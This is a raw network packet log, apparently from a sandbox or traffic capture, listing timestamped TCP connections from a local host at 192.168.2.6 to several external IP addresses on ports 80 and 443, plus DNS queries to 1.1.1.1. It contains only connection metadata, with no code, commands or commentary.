Nov 25, 2024 07:09:52.142592907 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.142643929 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.145339966 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.145400047 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.145509005 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.145561934 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.148677111 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.148689032 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.148730040 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.151740074 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.151751995 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.151782990 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.151794910 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.154747963 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.154803038 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.154895067 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.154952049 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.157820940 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.157871962 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.157994986 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.158041954 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.161017895 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.161052942 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.161103964 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.163919926 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.163985968 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.164084911 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.164129972 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.166529894 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.166594028 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.166623116 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.166665077 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.171200037 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.171214104 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.171267033 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.172993898 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.173005104 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.173074007 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.175952911 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.176024914 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.176107883 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.176150084 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.178983927 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.178997040 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.179050922 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.181813002 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.181874037 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.181981087 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.182029963 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.184797049 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.184811115 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.184858084 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.187633038 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.187804937 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.187891006 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.190491915 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.190505028 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.190617085 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.193111897 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.193233967 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.193272114 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.193458080 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.195990086 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.196002007 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.196055889 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.198451042 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.198512077 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.198745966 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.198885918 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.201163054 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.201215982 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.201349020 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.201395988 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.203836918 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.203850031 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.204930067 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.205760002 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.205815077 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.958642960 CET  49808        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:53.078186989 CET  80           49808      132.226.8.169    192.168.2.6
Nov 25, 2024 07:09:53.078318119 CET  49808        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:53.078775883 CET  49808        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:53.198179007 CET  80           49808      132.226.8.169    192.168.2.6
Nov 25, 2024 07:09:54.536580086 CET  80           49808      132.226.8.169    192.168.2.6
Nov 25, 2024 07:09:54.549007893 CET  49808        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:54.668438911 CET  80           49808      132.226.8.169    192.168.2.6
Nov 25, 2024 07:09:55.056010008 CET  80           49808      132.226.8.169    192.168.2.6
Nov 25, 2024 07:09:55.095979929 CET  49808        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:55.525746107 CET  49815        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:55.525796890 CET  443          49815      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:55.525893927 CET  49815        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:55.542853117 CET  49815        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:55.542882919 CET  443          49815      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:56.770319939 CET  443          49815      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:56.770409107 CET  49815        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:56.775199890 CET  49815        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:56.775207043 CET  443          49815      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:56.775604010 CET  443          49815      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:56.828228951 CET  49815        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:56.871341944 CET  443          49815      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:57.209762096 CET  443          49815      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:57.209923983 CET  443          49815      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:57.210042000 CET  49815        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:57.219996929 CET  49815        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:57.234265089 CET  49808        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:57.353816032 CET  80           49808      132.226.8.169    192.168.2.6
Nov 25, 2024 07:09:57.739171028 CET  80           49808      132.226.8.169    192.168.2.6
Nov 25, 2024 07:09:57.746447086 CET  49821        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:57.746476889 CET  443          49821      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:57.749058008 CET  49821        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:57.749434948 CET  49821        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:57.749447107 CET  443          49821      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:57.783586979 CET  49808        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:59.058844090 CET  443          49821      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:59.061567068 CET  49821        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:59.061587095 CET  443          49821      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:59.525197029 CET  443          49821      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:59.525342941 CET  443          49821      172.67.177.134   192.168.2.6
Nov 25, 2024 07:09:59.525556087 CET  49821        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:59.525914907 CET  49821        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:09:59.529634953 CET  49808        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:59.530951023 CET  49826        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:59.649492025 CET  80           49808      132.226.8.169    192.168.2.6
Nov 25, 2024 07:09:59.649585962 CET  49808        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:59.650428057 CET  80           49826      132.226.8.169    192.168.2.6
Nov 25, 2024 07:09:59.650507927 CET  49826        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:59.650675058 CET  49826        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:09:59.770121098 CET  80           49826      132.226.8.169    192.168.2.6
Nov 25, 2024 07:10:02.392956972 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:10:02.393028975 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:10:04.754462004 CET  80           49826      132.226.8.169    192.168.2.6
Nov 25, 2024 07:10:04.755840063 CET  49838        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:10:04.755876064 CET  443          49838      172.67.177.134   192.168.2.6
Nov 25, 2024 07:10:04.756011009 CET  49838        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:10:04.756304979 CET  49838        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:10:04.756314993 CET  443          49838      172.67.177.134   192.168.2.6
Nov 25, 2024 07:10:04.799293041 CET  49826        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:10:05.967865944 CET  443          49838      172.67.177.134   192.168.2.6
Nov 25, 2024 07:10:05.970580101 CET  49838        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:10:05.970597029 CET  443          49838      172.67.177.134   192.168.2.6
Nov 25, 2024 07:10:06.599773884 CET  443          49838      172.67.177.134   192.168.2.6
Nov 25, 2024 07:10:06.599836111 CET  443          49838      172.67.177.134   192.168.2.6
Nov 25, 2024 07:10:06.599953890 CET  49838        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:10:06.600867033 CET  49838        443        192.168.2.6      172.67.177.134
Nov 25, 2024 07:10:06.607743979 CET  49846        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:10:06.728499889 CET  80           49846      132.226.8.169    192.168.2.6
Nov 25, 2024 07:10:06.728588104 CET  49846        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:10:06.728753090 CET  49846        80         192.168.2.6      132.226.8.169
Nov 25, 2024 07:10:06.848239899 CET  80           49846      132.226.8.169    192.168.2.6
Nov 25, 2024 07:10:09.312534094 CET  80           49846      132.226.8.169    192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:09.314323902 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:09.314387083 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:09.314770937 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:09.315450907 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:09.315468073 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:09.363933086 CET4984680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:10.623887062 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:10.625988960 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:10.626013994 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:11.085382938 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:11.085469961 CET44349852172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:11.085525990 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:11.086040020 CET49852443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:11.089905977 CET4984680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:11.091133118 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:11.209732056 CET8049846132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:11.209817886 CET4984680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:11.210609913 CET8049858132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:11.210695028 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:11.210953951 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:11.330387115 CET8049858132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:12.638983011 CET8049858132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:12.640631914 CET49862443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:12.640685081 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:12.640850067 CET49862443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:12.641283989 CET49862443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:12.641302109 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:12.689860106 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:13.853091002 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:13.854945898 CET49862443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:13.854974031 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:14.299191952 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:14.299403906 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:14.299484968 CET49862443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:14.300009012 CET49862443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:14.304986000 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:14.306258917 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:14.425034046 CET8049858132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:14.425103903 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:14.425895929 CET8049866132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:14.425962925 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:14.426227093 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:14.545658112 CET8049866132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:16.424850941 CET8049866132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:16.425348997 CET8049866132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:16.426281929 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:16.426321983 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:16.426331997 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:16.426394939 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:16.426666975 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:16.426682949 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:17.642055035 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:17.644058943 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:17.644083023 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:18.087543011 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:18.087611914 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:18.087694883 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:18.095451117 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:18.100449085 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:18.101907969 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:18.220212936 CET8049866132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:18.220280886 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:18.221287966 CET8049877132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:18.221379995 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:18.221563101 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:18.341033936 CET8049877132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:19.680177927 CET8049877132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:19.682008982 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:19.682061911 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:19.682471037 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:19.682791948 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:19.682809114 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:19.721112967 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:20.984571934 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:20.987107038 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:20.987142086 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:21.453036070 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:21.453164101 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:21.453219891 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:21.453742981 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:21.458446980 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:21.459945917 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:21.578166962 CET8049877132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:21.578248024 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:21.579426050 CET8049885132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:21.579511881 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:21.579725981 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:21.699167013 CET8049885132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:22.979583025 CET8049885132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:23.011063099 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:23.011113882 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:23.011189938 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:23.011502028 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:23.011513948 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:23.033601046 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.267637968 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.270216942 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:24.270241976 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.722225904 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.722301960 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.722460985 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:24.723114967 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:24.726216078 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.727279902 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.846170902 CET8049885132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.846327066 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.846823931 CET8049896132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.846921921 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.847112894 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.966542959 CET8049896132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:26.655838966 CET8049896132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:26.657438993 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:26.657495022 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:26.657569885 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:26.657891035 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:26.657903910 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:26.705472946 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:27.959510088 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:27.961266041 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:27.961304903 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:28.422044992 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:28.422115088 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:28.422163963 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:28.423037052 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:28.474313021 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:28.594543934 CET8049896132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:28.594620943 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:28.613492966 CET49907443192.168.2.6149.154.167.220
                                                                                                                                                  Nov 25, 2024 07:10:28.613533020 CET44349907149.154.167.220192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:28.613610029 CET49907443192.168.2.6149.154.167.220
Nov 25, 2024 07:10:28.614248037 CET | 49907 | 443 | 192.168.2.6 | 149.154.167.220
Nov 25, 2024 07:10:28.614264011 CET | 443 | 49907 | 149.154.167.220 | 192.168.2.6
Nov 25, 2024 07:10:30.277883053 CET | 443 | 49907 | 149.154.167.220 | 192.168.2.6
Nov 25, 2024 07:10:30.277996063 CET | 49907 | 443 | 192.168.2.6 | 149.154.167.220
Nov 25, 2024 07:10:30.280361891 CET | 49907 | 443 | 192.168.2.6 | 149.154.167.220
Nov 25, 2024 07:10:30.280388117 CET | 443 | 49907 | 149.154.167.220 | 192.168.2.6
Nov 25, 2024 07:10:30.280659914 CET | 443 | 49907 | 149.154.167.220 | 192.168.2.6
Nov 25, 2024 07:10:30.282289982 CET | 49907 | 443 | 192.168.2.6 | 149.154.167.220
Nov 25, 2024 07:10:30.327332973 CET | 443 | 49907 | 149.154.167.220 | 192.168.2.6
Nov 25, 2024 07:10:30.799941063 CET | 443 | 49907 | 149.154.167.220 | 192.168.2.6
Nov 25, 2024 07:10:30.800024986 CET | 443 | 49907 | 149.154.167.220 | 192.168.2.6
Nov 25, 2024 07:10:30.800345898 CET | 49907 | 443 | 192.168.2.6 | 149.154.167.220
Nov 25, 2024 07:10:30.804508924 CET | 49907 | 443 | 192.168.2.6 | 149.154.167.220
Nov 25, 2024 07:10:36.607127905 CET | 49826 | 80 | 192.168.2.6 | 132.226.8.169
Nov 25, 2024 07:10:37.648421049 CET | 49928 | 80 | 192.168.2.6 | 5.182.211.149
Nov 25, 2024 07:10:37.767915010 CET | 80 | 49928 | 5.182.211.149 | 192.168.2.6
Nov 25, 2024 07:10:37.768013954 CET | 49928 | 80 | 192.168.2.6 | 5.182.211.149
Nov 25, 2024 07:10:37.774224997 CET | 49928 | 80 | 192.168.2.6 | 5.182.211.149
Nov 25, 2024 07:10:37.779309988 CET | 49928 | 80 | 192.168.2.6 | 5.182.211.149
Nov 25, 2024 07:10:37.893676996 CET | 80 | 49928 | 5.182.211.149 | 192.168.2.6
Nov 25, 2024 07:10:37.898782015 CET | 80 | 49928 | 5.182.211.149 | 192.168.2.6
Nov 25, 2024 07:10:37.898859024 CET | 80 | 49928 | 5.182.211.149 | 192.168.2.6
Nov 25, 2024 07:10:39.098196983 CET | 80 | 49928 | 5.182.211.149 | 192.168.2.6
Nov 25, 2024 07:10:39.143002033 CET | 49928 | 80 | 192.168.2.6 | 5.182.211.149
Nov 25, 2024 07:10:43.918637037 CET | 80 | 49928 | 5.182.211.149 | 192.168.2.6
Nov 25, 2024 07:10:43.918709040 CET | 49928 | 80 | 192.168.2.6 | 5.182.211.149
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 07:09:49.646096945 CET | 59259 | 53 | 192.168.2.6 | 1.1.1.1
Nov 25, 2024 07:09:49.922653913 CET | 53 | 59259 | 1.1.1.1 | 192.168.2.6
Nov 25, 2024 07:09:52.815150976 CET | 55428 | 53 | 192.168.2.6 | 1.1.1.1
Nov 25, 2024 07:09:52.952358007 CET | 53 | 55428 | 1.1.1.1 | 192.168.2.6
Nov 25, 2024 07:09:55.387236118 CET | 51028 | 53 | 192.168.2.6 | 1.1.1.1
Nov 25, 2024 07:09:55.524797916 CET | 53 | 51028 | 1.1.1.1 | 192.168.2.6
Nov 25, 2024 07:10:28.475227118 CET | 56235 | 53 | 192.168.2.6 | 1.1.1.1
Nov 25, 2024 07:10:28.612538099 CET | 53 | 56235 | 1.1.1.1 | 192.168.2.6
Nov 25, 2024 07:10:37.034605026 CET | 52552 | 53 | 192.168.2.6 | 1.1.1.1
Nov 25, 2024 07:10:37.617105961 CET | 53 | 52552 | 1.1.1.1 | 192.168.2.6
